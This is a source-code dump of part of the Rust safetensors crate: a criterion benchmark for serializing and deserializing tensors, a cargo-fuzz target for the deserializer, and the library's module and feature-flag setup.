--------------------------------------------------------------------------------
/safetensors/LICENSE:
--------------------------------------------------------------------------------
1 | ../LICENSE
--------------------------------------------------------------------------------
/safetensors/README.md:
--------------------------------------------------------------------------------
1 | ../README.md
--------------------------------------------------------------------------------
/safetensors/benches/benchmark.rs:
--------------------------------------------------------------------------------
1 | use criterion::{black_box, criterion_group, criterion_main, Criterion};
2 | use safetensors::tensor::*;
3 | use std::collections::HashMap;
4 |
5 | // Returns a sample data of size 2_MB
6 | fn get_sample_data() -> (Vec, Vec, Dtype) {
7 | let shape = vec![1000, 500];
8 | let dtype = Dtype::F32;
9 | let n: usize = shape.iter().product::() * dtype.size(); // 4
10 | let data = vec![0; n];
11 |
12 | (data, shape, dtype)
13 | }
14 |
15 | pub fn bench_serialize(c: &mut Criterion) {
16 | let (data, shape, dtype) = get_sample_data();
17 | let n_layers = 5;
18 |
19 | let mut metadata: HashMap = HashMap::new();
20 | // 2_MB x 5 = 10_MB
21 | for i in 0..n_layers {
22 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
23 | metadata.insert(format!("weight{i}"), tensor);
24 | }
25 |
26 | c.bench_function("Serialize 10_MB", |b| {
27 | b.iter(|| {
28 | let _serialized = serialize(black_box(&metadata), black_box(&None));
29 | })
30 | });
31 | }
32 |
33 | pub fn bench_deserialize(c: &mut Criterion) {
34 | let (data, shape, dtype) = get_sample_data();
35 | let n_layers = 5;
36 |
37 | let mut metadata: HashMap = HashMap::new();
38 | // 2_MB x 5 = 10_MB
39 | for i in 0..n_layers {
40 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap();
41 | metadata.insert(format!("weight{i}"), tensor);
42 | }
43 |
44 | let out = serialize(&metadata, &None).unwrap();
45 |
46 | c.bench_function("Deserialize 10_MB", |b| {
47 | b.iter(|| {
48 | let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap();
49 | })
50 | });
51 | }
52 |
53 | criterion_group!(bench_ser, bench_serialize);
54 | criterion_group!(bench_de, bench_deserialize);
55 | criterion_main!(bench_ser, bench_de);
56 |
--------------------------------------------------------------------------------
/safetensors/fuzz/.gitignore:
--------------------------------------------------------------------------------
1 | target
2 | corpus
3 | artifacts
4 | coverage
5 |
--------------------------------------------------------------------------------
/safetensors/fuzz/Cargo.toml:
--------------------------------------------------------------------------------
1 | [package]
2 | name = "safetensors-fuzz"
3 | version = "0.0.0"
4 | publish = false
5 | edition = "2021"
6 |
7 | [package.metadata]
8 | cargo-fuzz = true
9 |
10 | [dependencies]
11 | libfuzzer-sys = "0.4"
12 |
13 | [dependencies.safetensors]
14 | path = ".."
15 |
16 | # Prevent this from interfering with workspaces
17 | [workspace]
18 | members = ["."]
19 |
20 | [profile.release]
21 | debug = 1
22 |
23 | [[bin]]
24 | name = "fuzz_target_1"
25 | path = "fuzz_targets/fuzz_target_1.rs"
26 | test = false
27 | doc = false
28 |
--------------------------------------------------------------------------------
/safetensors/fuzz/fuzz_targets/fuzz_target_1.rs:
--------------------------------------------------------------------------------
1 | #![no_main]
2 |
3 | use libfuzzer_sys::fuzz_target;
4 | use safetensors::tensor::SafeTensors;
5 |
6 | fuzz_target!(|data: &[u8]| {
7 | let _ = SafeTensors::deserialize(data);
8 | });
9 |
--------------------------------------------------------------------------------
/safetensors/src/lib.rs:
--------------------------------------------------------------------------------
1 | #![deny(missing_docs)]
2 | #![doc = include_str!("../README.md")]
3 | #![cfg_attr(not(feature = "std"), no_std)]
4 | pub mod slice;
5 | pub mod tensor;
6 | /// serialize_to_file only valid in std
7 | #[cfg(feature = "std")]
8 | pub use tensor::serialize_to_file;
9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View};
10 |
11 | #[cfg(feature = "alloc")]
12 | #[macro_use]
13 | extern crate alloc;
14 |
15 | #[cfg(all(feature = "std", feature = "alloc"))]
16 | compile_error!("must choose either the `std` or `alloc` feature, but not both.");
17 | #[cfg(all(not(feature = "std"), not(feature = "alloc")))]
18 | compile_error!("must choose either the `std` or `alloc` feature");
19 |
20 | /// A facade around all the types we need from the `std`, `core`, and `alloc`
21 | /// crates. This avoids elaborate import wrangling having to happen in every
22 | /// module.
23 | mod lib {
24 | #[cfg(not(feature = "std"))]
25 | mod no_stds {
26 | pub use alloc::borrow::Cow;
27 | pub use alloc::string::{String, ToString};
28 | pub use alloc::vec::Vec;
29 | pub use hashbrown::HashMap;
30 | }
31 | #[cfg(feature = "std")]
32 | mod stds {
33 | pub use std::borrow::Cow;
34 | pub use std::collections::HashMap;
35 | pub use std::string::{String, ToString};
36 | pub use std::vec::Vec;
37 | }
38 | /// choose std or no_std to export by feature flag
39 | #[cfg(not(feature = "std"))]
40 | pub use no_stds::*;
41 | #[cfg(feature = "std")]
42 | pub use stds::*;
43 | }
44 |
--------------------------------------------------------------------------------